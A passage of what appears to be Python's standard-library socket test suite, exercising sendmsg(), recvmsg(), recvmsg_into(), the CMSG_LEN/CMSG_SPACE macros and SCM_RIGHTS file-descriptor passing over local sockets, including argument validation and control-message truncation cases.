def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
try:
while True:
self.sendmsgToServer([b"a"*512])
except socket.timeout:
pass
except OSError as exc:
if exc.errno != errno.ENOMEM:
raise
# bpo-33937 the test randomly fails on Travis CI with
# "OSError: [Errno 12] Cannot allocate memory"
else:
self.fail("socket.timeout not raised")
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
# bpo-33937: catch also ENOMEM, the test randomly fails on Travis CI
# with "OSError: [Errno 12] Cannot allocate memory"
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK, errno.ENOMEM))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
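# A minimal sketch (not part of the test suite and never called at import
# time) of sendmsg() with an explicit destination address, the behaviour
# SendmsgConnectionlessTests requires for unconnected datagram sockets.
# It assumes an IPv4 loopback is available; the function name is purely
# illustrative.
def _sketch_sendmsg_with_address():
    receiver = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sender = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        receiver.bind((HOST, 0))
        # The destination is the fourth positional argument, after the
        # buffers, the ancillary data list and the flags.
        sender.sendmsg([b"ping"], [], 0, receiver.getsockname())
        assert receiver.recv(1024) == b"ping"
    finally:
        sender.close()
        receiver.close()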
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
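# A minimal sketch (not part of the test suite and never called at import
# time) of the CMSG_LEN()/CMSG_SPACE() relationship that CmsgMacroTests
# checks above: CMSG_LEN() is the exact header-plus-payload length, while
# CMSG_SPACE() also includes trailing padding and is the value to use when
# sizing a receive buffer.  The function name is purely illustrative.
def _sketch_cmsg_sizes(payload_len=SIZEOF_INT):
    if not (hasattr(socket, "CMSG_LEN") and hasattr(socket, "CMSG_SPACE")):
        return None
    exact = socket.CMSG_LEN(payload_len)
    padded = socket.CMSG_SPACE(payload_len)
    # Padding can only add to the size, never remove payload space.
    assert padded >= exact >= payload_len
    return exact, padded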
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
